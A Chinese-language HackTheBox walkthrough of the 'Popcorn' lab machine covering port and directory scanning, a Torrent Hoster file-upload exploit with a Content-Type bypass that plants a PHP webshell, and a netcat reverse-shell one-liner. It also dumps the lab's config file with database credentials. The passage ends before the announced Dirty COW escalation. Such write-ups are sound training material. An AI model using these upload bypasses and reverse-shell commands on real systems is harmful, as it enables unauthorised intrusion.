Popcorn-htb-writeup

0x00 靶场技能介绍

章节技能:Torrent Hoster 文件上传漏洞、木马文件上传格式绕过、Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

参考链接:https://cyberkareem.medium.com/hackthebox-popcorn-walkthrough-68a0e719c8bc

参考链接:https://0xdf.gitlab.io/2020/06/23/htb-popcorn.html

参考链接:https://kalistudy-bucket.oss-cn-hongkong.aliyuncs.com/uploads/2019/12/Popcorn.pdf

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.6

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo nmap -p- -Pn --min-rate=10000 10.10.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 12:50 GMT
Nmap scan report for 10.10.10.6
Host is up (0.096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo nmap -p22,80 -sV -sC --min-rate=5000 10.10.10.6
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 13:02 GMT
Nmap scan report for 10.10.10.6
Host is up (0.0037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)
|_  2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Did not follow redirect to http://popcorn.htb/
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

3、这里发现了个新增域名,本地绑定下hosts

1
2
3
┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.6 popcorn.htb" | sudo tee -a /etc/hosts
10.10.10.6 popcorn.htb

4、针对发现的80端口WEB服务先扫描下目录情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ dirsearch -u http://popcorn.htb/
Directory /usr/lib/python3/dist-packages/dirsearch is not writable
Directory /usr/lib/python3/dist-packages/dirsearch is not writable

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30
Wordlist size: 10903

Output File: /usr/lib/python3/dist-packages/dirsearch/reports/popcorn.htb/-_24-01-02_13-09-20.txt

Error Log: /usr/lib/python3/dist-packages/dirsearch/logs/errors-24-01-02_13-09-20.log

Target: http://popcorn.htb/

[13:09:21] Starting: 
[13:09:26] 200 -  177B  - /index
[13:09:26] 200 -  177B  - /index.html
[13:09:29] 200 -   47KB - /test.php
[13:09:29] 200 -   48KB - /test/tmp/
[13:09:29] 200 -   48KB - /test/
[13:09:29] 200 -   48KB - /test/reports
[13:09:29] 200 -   48KB - /test/version_tmp/
[13:09:29] 200 -   47KB - /test

Task Completed
<dirsearch.dirsearch.Program object at 0x7fdf28f8db50>


┌─[us-vip-22]─[10.10.14.3]─[shiyan@htb-rlecfd7idm]─[~/Desktop]
└──╼ [★]$ sudo gobuster dir -u http://popcorn.htb/ --wordlist=/usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://popcorn.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/02 13:17:43 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 283]
/.htpasswd            (Status: 403) [Size: 288]
/.htaccess            (Status: 403) [Size: 288]
/cgi-bin/             (Status: 403) [Size: 287]
/index                (Status: 200) [Size: 177]
/index.html           (Status: 200) [Size: 177]
/test                 (Status: 200) [Size: 47353]
/torrent              (Status: 301) [Size: 312] [--> http://popcorn.htb/torrent/]
Progress: 4614 / 4615 (99.98%)                                                  [ERROR] 2024/01/02 13:17:54 [!] Get "http://popcorn.htb/server-status": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
                                                                                 
===============================================================
2024/01/02 13:17:54 Finished
===============================================================

5、到这里,根据扫描的目录情况,是发现了一些信息的

http://popcorn.htb/test

http://popcorn.htb/torrent/

6、在这个页面上发现可以自行注册账号,我们注册了以下的测试账号

1
2
Username: 	test
Password: 	test

7、这里使用 searchsploit 进行扫描目标系统的漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Torrent Hoster
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Torrent Hoster - Remount Upload                        | php/webapps/11746.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/11746.txt
  Exploit: Torrent Hoster - Remount Upload
      URL: https://www.exploit-db.com/exploits/11746
     Path: /usr/share/exploitdb/exploits/php/webapps/11746.txt
    Codes: N/A
 Verified: False
File Type: HTML document, ASCII text
Copied to: /home/kali/桌面/11746.txt

┌──(kali㉿kali)-[~/桌面]
└─$ cat 11746.txt 
========================================================================================
| # Title    : Torrent Hoster Remont Upload Exploit
| # Author   : El-Kahina
| # Home     : www.h4kz.com                                                                              |
| # Script   : Powered by Torrent Hoster.
| # Tested on: windows SP2 Fran&#65533;ais V.(Pnx2 2.0) + Lunix Fran&#65533;ais v.(9.4 Ubuntu)
| # Bug      : Upload
|
======================      Exploit By El-Kahina       =================================
 # Exploit  :

 1 - use tamper data :

 http://127.0.0.1/torrenthoster//torrents.php?mode=upload

 2-
    <center>
   Powered by Torrent Hoster
        <br />
        <form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
        <strong>&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533; &#65533;&#65533;:</strong> <?php echo $maxfilesize; ?>&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;<br />
<br>
        <input type="file" name="upfile" size="50" /><br />
<input type="submit" value="&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;" id="upload" />
        </form>
        <div id="part2" style="display: none;">&#65533;&#65533;&#65533; &#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533; .. &#65533;&#65533; &#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;</div>
        </center>

3 - http://127.0.0.1/torrenthoster/torrents/  (to find shell)

4 - Xss:

http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>

==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
------------------------------------------

8、可以看出来这里是存在一个上传漏洞的

9、在简单的尝试中,发现这里没法上传图片,必须上传一个 torrent 的文件,所以翻了一些这个格式的文件,翻到了kali的历史的文件,这里就用这个文件上传吧。

https://old.kali.org/kali-images/kali-1.0.0/kali-linux-1.0.0-amd64.iso.torrent

10、上传成功后,访问这个文件的目录地址

http://popcorn.htb/torrent/torrents.php?mode=details&id=bc233c553f9f8562e0584e23c2a6765aa504e81b

11、经过摸索,发现在上传图片这里,可以上传图片类型的格式文件

12、这里直接上传PHP的木马文件,只不过修改了下 Content-Type 这个标题头为 image/png 来绕过这个上传限制

13、可以看到,成功上传了一个PHP的文件

14、经过翻找,上传的文件在上传目录里放着

http://popcorn.htb/torrent/upload/

15、我们直接通过上传的目录,运行一个反弹shell,来获取初始的权限

http://popcorn.htb/torrent/upload/bc233c553f9f8562e0584e23c2a6765aa504e81b.php

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f

16、成功获取到初始的权限shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.6] 43798
sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
sh: python3: not found
$ ls -la
total 120
drwxrwxrwx  2 www-data www-data  4096 Jan  2 15:55 .
drwxr-xr-x 15 www-data www-data  4096 Mar 17  2017 ..
-rw-r--r--  1 www-data www-data 59294 Mar 17  2017 723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
-rw-r--r--  1 www-data www-data 13585 Jan  2 15:55 bc233c553f9f8562e0584e23c2a6765aa504e81b.php
-rw-r--r--  1 www-data www-data 33029 Jun  2  2007 noss.png
$ pwd
/var/www/torrent/upload

17、通过各种网站目录翻找,终于找到了一个配置文件,里面涉及账号密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
$ cd ../
$ ls -la
total 196
drwxr-xr-x 15 www-data www-data  4096 Mar 17  2017 .
drwxr-xr-x  4 www-data www-data  4096 Apr 11  2017 ..
drwxr-xr-x  2 www-data www-data  4096 Jan 31  2010 PNG
drwxr-xr-x  4 www-data www-data  4096 Jun  3  2007 admin
-rw-r--r--  1 www-data www-data  1704 Jun  1  2007 browse.php
-rw-r--r--  1 www-data www-data  3042 Jun  3  2007 comment.php
-rw-r--r--  1 www-data www-data  6684 Nov 21 19:26 config.php
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 css
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 database
-rw-r--r--  1 www-data www-data   125 Jan 20  2007 download.php
-rw-r--r--  1 www-data www-data  1612 Jun  3  2007 edit.php
drwxr-xr-x  2 www-data www-data  4096 Jan 31  2010 health
-rw-r--r--  1 www-data www-data  3765 Mar  6  2005 hide.js
drwxr-xr-x  2 www-data www-data  4096 Jan 31  2010 images
-rw-r--r--  1 www-data www-data  1604 Jun  3  2007 index.php
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 js
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 lib
-rw-r--r--  1 www-data www-data  1825 Jan  9  2007 login.php
-rw-r--r--  1 www-data www-data   329 Dec 28  2006 logout.php
-rw-r--r--  1 www-data www-data 28104 Jan 27  2010 preview.gif
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 readme
-rw-r--r--  1 www-data www-data  3307 Jun 10  2005 rss.php
-rw-r--r--  1 www-data www-data   573 Nov 29  2006 secure.php
-rw-r--r--  1 www-data www-data  6257 Mar  6  2005 sorttable.js
-rw-r--r--  1 www-data www-data   321 Nov 28  2006 stylesheet.css
drwxr-xr-x  3 www-data www-data  4096 Jun  3  2007 templates
-rw-r--r--  1 www-data www-data  4190 Dec 28  2006 thumbnail.php
drwxrwxrwx  2 www-data www-data  4096 Jan  2 15:44 torrents
-rw-r--r--  1 www-data www-data  7221 Jun  3  2007 torrents.php
-rw-r--r--  1 www-data www-data   539 Nov 30  2006 update_stats.php
-rw-r--r--  1 www-data www-data   986 Jun  3  2007 update_stats2.php
drwxrwxrwx  2 www-data www-data  4096 Jan  2 15:55 upload
-rw-r--r--  1 www-data www-data 15087 Mar 17  2017 upload.php
-rw-r--r--  1 www-data www-data  1467 Jun  3  2007 upload_file.php
drwxr-xr-x  3 www-data www-data  4096 Jan 31  2010 users
-rw-r--r--  1 www-data www-data  3548 Mar  6  2005 validator.php
$ cd users      
$ ls -la
total 60
drwxr-xr-x  3 www-data www-data  4096 Jan 31  2010 .
drwxr-xr-x 15 www-data www-data  4096 Mar 17  2017 ..
-rw-r--r--  1 www-data www-data  2204 Mar  6  2005 change_password.php
-rw-r--r--  1 www-data www-data  1753 Mar  6  2005 change_settings.php
-rw-r--r--  1 www-data www-data   680 Mar  6  2005 change_settings_form.php
-rw-r--r--  1 www-data www-data  1555 Mar 11  2005 forgot_password.php
-rw-r--r--  1 www-data www-data   701 Jul  7  2006 img.jpg
-rw-r--r--  1 www-data www-data  6891 Jan 24  2007 index.php
-rw-r--r--  1 www-data www-data   822 Jul  7  2006 php_captcha.php
-rw-r--r--  1 www-data www-data  2287 Jan 24  2007 registration.php
drwxr-xr-x  2 www-data www-data  4096 Jun  3  2007 templates
-rw-r--r--  1 www-data www-data 11110 Mar  6  2005 validation_class.php
$ cat change_password.php
<?

include("../config.php");
require_login();

/* form has been submitted, check if it the user login information is correct */
if (match_referer() && isset($_POST)) {
        $frm = $_POST;
        $errormsg = validate_form($frm, $errors);

        if (empty($errormsg)) {
                update_password($frm["newpassword"]);
                $noticemsg = "Password change successful";
        }
}

$DOC_TITLE = "Change Password";
include("$CFG->templatedir/header.php");
include("$CFG->templatedir/form_header.php");
include("templates/change_password_form.php");
include("$CFG->templatedir/footer.php");

/******************************************************************************
 * FUNCTIONS
 *****************************************************************************/

function validate_form(&$frm, &$errors) {
/* validate the forgot password form, and return the error messages in a string.
 * if the string is empty, then there are no errors */

        $errors = new Object;
        $msg = "";

        if (empty($frm["oldpassword"])) {
                $errors->oldpassword = true;
                $msg .= "You did not specify your old password";

        } elseif (! password_valid($frm["oldpassword"])) {
                $errors->oldpassword = true;
                $msg .= "Your old password is invalid";

        } elseif (empty($frm["newpassword"])) {
                $errors->newpassword = true;
                $msg .= "You did not specify your new password";

        } elseif (empty($frm["newpassword2"])) {
                $errors->newpassword2 = true;
                $msg .= "You did not confirm your new password";

        } elseif ($frm["newpassword"] != $frm["newpassword2"]) {
                $errors->newpassword = true;
                $errors->newpassword2 = true;
                $msg .= "Your new passwords do not match";
        }

        return $msg;
}

function password_valid($password) {
/* return true if the user's password is valid */

        global $_SESSION;

        $username = $_SESSION["userName"];
        $password = md5($password);

        $qid = db_query("SELECT 1 FROM users WHERE username = '$username' AND password = '$password'");
        return db_num_rows($qid);
}

function update_password($newpassword) {
/* set the user's password to the new one */

        global $_SESSION;

        $username = $_SESSION["userName"];
        $newpassword = md5($newpassword);

        $qid = db_query("UPDATE users SET password = '$newpassword' WHERE username = '$username'");
}

?>
$ cd ../
$ cat config.php
<?php

  //rename this file to config.php
  /* turn on verbose error reporting (15) to see all warnings and errors */
  error_reporting(15);

//include "forumdb.php";

  //define a generic object to hold all the configuration variables
  class object {};

  //declare an instance of the generic object
  $CFG = new object;
  //declare root directory
  $CFG->dirroot     = dirname(__FILE__);

  //Edit This For TORRENT HOSTER Database
  //database configuration
  $CFG->host = "localhost";
  $CFG->dbName = "torrenthoster";       //db name
  $CFG->dbUserName = "torrent";    //db username
  $CFG->dbPassword = "SuperSecret!!";   //db password

        $dbhost         = $CFG->host;
        $dbuser         = $CFG->dbUserName;
        $dbpass         = $CFG->dbPassword;
        $database       = $CFG->dbName;

 /* directory configuration, if all your webtorrent.com files are in one directory
 * you probably only need to set the wwwroot variable.  valid examples are:
 *
 * $CFG->wwwroot = "http://myserver.com/webtorrent";
 * $CFG->wwwroot = "http://localhost/webtorrent";
 * $CFG->wwwroot = "http://myserver.com";
 *
 * do not include the trailing slash. dirroot is the physical path on your
 * server where the application can find it's files. for more security, it is
 * recommended that you move the libraries and templates ($CFG->libdir
 * and $CFG->templatedir) outside of your web directories.
 */

  /* Edit below this */

  $CFG->wwwroot  = "http://popcorn.htb/torrent";  //full path to your website
  $CFG->forumroot = "http://www.myanmartorrents.com/phpbb";
  $CFG->webname = "Torrent Hoster";
  $CFG->support     = "webmaster@wmyanmartorrents.com";
  $CFG->rssnum      = "10"; //number of rss to show
  $CFG->mainnews        = "10"; //number of news on the main page, use 0 to not print news on main page
  $CFG->maintorrents= "30";//number of torrents in the main page
  $CFG->torrents    = "$CFG->dirroot/torrents"; //torrent folder repect to your wwwroot
  $CFG->usesub      = "yes"; //Do you want to use Subcategories? "yes" or "no"
  //$CFG->usephpbb  = "no"; //put "yes" if you want to connect with phpbb users. "yes" or "no" << DO NOT USE IT YET
  $CFG->regdownload = "yes"; //only registered users can download torrents. "yes" or "no"
  $CFG->regupload   = "yes"; //only registered users can upload torrents. "yes" or "no"
  /*
      no to change below this (i think)
  */

  $CFG->templatedir = "$CFG->dirroot/templates";
  $CFG->libdir      = "$CFG->dirroot/lib";
  $CFG->imagedir    = "$CFG->wwwroot/images";
  $CFG->health      = "$CFG->wwwroot/health";
  $CFG->icondir     = "$CFG->imagedir/icons";
  $CFG->version     = "2.0";

  //$CFG->sessionname = "mtc";

  /* define database error handling behavior, since we are in development stages
  * we will turn on all the debugging messages to help us troubleshoot */
  $DB_DEBUG = true;
  $DB_DIE_ON_FAIL = true;

  //start session to hold username and password when linking from page to page
  session_start();
  header("Cache-control: private"); // IE 6 Bug Fix.

  //load up libraries
  require "lib/dblib.php";
  require "lib/stdlib.php";
  require "lib/webtorrent.php";

  /* setup some global variables */
  $ME = qualified_me();

  /* connect to the database */
  db_connect($CFG->host, $CFG->dbName, $CFG->dbUserName, $CFG->dbPassword);

/*
        Print out header
  *******************************************/
  function stheader($title)
  {
  //global $time_begin;
  //$time_begin = get_micro_time();

  //global $sitename;
  echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  <html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
  <link rel="stylesheet" href="stylesheet.css" type="text/css" />
  <title>T-Xore : ';

  //echo htmlentities($title);

echo '</title>
</head><body>
<script type="text/javascript" src="dyn.js"></script>
';

}

// Get microtime
function get_micro_time()
{
  list($usec, $sec) = explode(' ', microtime());
  return ((float)$usec + (float)$sec);
}

function connect_forum($fdbhost, $fdbuser, $fdbpass, $fdatabase)
{
$errormes = 'The sql server has encountered a problem, we are trying to fix it as soon as possible';
@$connection = mysql_connect($fdbhost, $fdbuser, $fdbpass);
@mysql_select_db($fdatabase) or die($errormes);
}

function torsize ($size)
{
if ($size >= 1099511627776)     {$size = round($size / 1024 / 1024 / 1024 / 1024, 2).' TB';}
elseif ($size >= 1073741824)    {$size = round($size / 1024 / 1024 / 1024, 2).' GB';}
elseif ($size >= 1048576)               {$size = round($size / 1024 / 1024, 2).' MB';}
elseif ($size >= 1024)                  {$size = round($size / 1024, 2).' KB';}
else                                                    {$size = $size.' Byte';}
return $size;
}

/* show files contained in a torrent */
function showfiles($hash)
{
$filename2 = $hash;
//global $CFG->torrents;
include_once("lib/BDecode.php") ;
include_once("lib/BEncode.php") ;
include_once("config.php") ;

$filename = "torrents/$filename2.btf";

$stream = @file_get_contents("$filename");


if ($stream == FALSE)
{
echo 'No details availiable... 1 ';
}
if(!isset($stream))
{
echo 'No details availiable... 2 ';
break;
}
else
{

$array = BDecode($stream);
if ($array === FALSE)

{
echo 'No details availiable... 3 ';
break;
}
else
{
if(array_key_exists("info", $array) === FALSE){
echo 'No details availiable... 4 ';
break;
}
else
{
$infovariable = $array["info"];
if (isset($infovariable["files"]))
{

$filecount = "";
foreach ($infovariable["files"] as $file)
{

$row_color = ($row_count % 2) ? $color1 : $color2;

$filecount += "1";
$multiname = $file['path'];
$multitorrentsize = torsize ($file['length']);
$torrentsize += $file['length'];
$combinedsize = torsize($torrentsize);
$strname = strip_tags ($multiname[0]);

$strname = htmlentities($strname);
$strname = strip_tags($strname);

echo "<tr><td width=\"50%\">$strname</td><td> $multitorrentsize</td></tr>";
$row_count++;
}
}
else
{
$singletf = $infovariable['name'] ;
$singletf  = strip_tags($singletf );
$torrentsize = torsize($infovariable['length']);

$singletf = htmlentities($singletf);
$singletf = strip_tags($singletf);

echo "<tr><td width=\"80%\">$torrentsize</td><td>$singletf</td></tr>";
}
}
}
}
}

function connect ($dbhost, $dbuser, $dbpass, $database)
{
$errormes = 'The sql server has encountered a problem, we are trying to fix it as soon as possible';
@$connection = mysql_connect($dbhost, $dbuser, $dbpass);
@mysql_select_db($database) or die($errormes);
}


?>
$

18、特意显示下发现的账号密码信息

1
2
3
4
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster";       //db name
$CFG->dbUserName = "torrent";    //db username
$CFG->dbPassword = "SuperSecret!!";   //db password

19、然后我去翻用户的目录,发现我直接可以查看 uset.txt 文件,嘿嘿

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ ls -la /home
total 12
drwxr-xr-x  3 root   root   4096 Mar 17  2017 .
drwxr-xr-x 21 root   root   4096 Jan  2 14:48 ..
drwxr-xr-x  3 george george 4096 Oct 26 14:57 george
$ ls -la /home/george
total 860
drwxr-xr-x 3 george george   4096 Oct 26 14:57 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Jan  2 14:48 user.txt
$ cat /home/george/user.txt
46716af63b9b0e4f27387e81f451e5da
$

0x02 系统权限获取

20、通过查看进程情况,发现还是存在MySQL数据运行的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
$ ss -lt
sh: ss: not found
$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2528  1416 ?        Ss   14:48   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   14:48   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   14:48   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   14:48   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   14:48   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   14:48   0:00 [cpuset]
root         8  0.0  0.0      0     0 ?        S<   14:48   0:00 [khelper]
root         9  0.0  0.0      0     0 ?        S<   14:48   0:00 [netns]
root        10  0.0  0.0      0     0 ?        S<   14:48   0:00 [async/mgr]
root        11  0.0  0.0      0     0 ?        S<   14:48   0:00 [kintegrityd/0]
root        12  0.0  0.0      0     0 ?        S<   14:48   0:00 [kblockd/0]
root        13  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpid]
root        14  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpi_notify]
root        15  0.0  0.0      0     0 ?        S<   14:48   0:00 [kacpi_hotplug]
root        16  0.0  0.0      0     0 ?        S<   14:48   0:00 [ata/0]
root        17  0.0  0.0      0     0 ?        S<   14:48   0:00 [ata_aux]
root        18  0.0  0.0      0     0 ?        S<   14:48   0:00 [ksuspend_usbd]
root        19  0.0  0.0      0     0 ?        S<   14:48   0:00 [khubd]
root        20  0.0  0.0      0     0 ?        S<   14:48   0:00 [kseriod]
root        21  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmmcd]
root        22  0.0  0.0      0     0 ?        S<   14:48   0:00 [bluetooth]
root        23  0.0  0.0      0     0 ?        S    14:48   0:00 [khungtaskd]
root        24  0.0  0.0      0     0 ?        S    14:48   0:00 [pdflush]
root        25  0.0  0.0      0     0 ?        S    14:48   0:00 [pdflush]
root        26  0.0  0.0      0     0 ?        S<   14:48   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        S<   14:48   0:00 [aio/0]
root        28  0.0  0.0      0     0 ?        S<   14:48   0:00 [ecryptfs-kthrea]
root        29  0.0  0.0      0     0 ?        S<   14:48   0:00 [crypto/0]
root        32  0.0  0.0      0     0 ?        S<   14:48   0:00 [pciehpd]
root        34  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_0]
root        35  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_1]
root        36  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_2]
root        37  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_3]
root        38  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_4]
root        39  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_5]
root        40  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_6]
root        41  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_7]
root        42  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_8]
root        43  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_9]
root        44  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_10]
root        45  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_11]
root        46  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_12]
root        47  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_13]
root        48  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_14]
root        49  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_15]
root        50  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_16]
root        51  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_17]
root        52  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_18]
root        53  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_19]
root        54  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_20]
root        55  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_21]
root        56  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_22]
root        57  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_23]
root        58  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_24]
root        59  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_25]
root        60  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_26]
root        61  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_27]
root        62  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_28]
root        63  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_29]
root        64  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_30]
root        66  0.0  0.0      0     0 ?        S<   14:48   0:00 [scsi_eh_31]
root        68  0.0  0.0      0     0 ?        S<   14:48   0:00 [kstriped]
root        70  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmpathd/0]
root        72  0.0  0.0      0     0 ?        S<   14:48   0:00 [kmpath_handlerd]
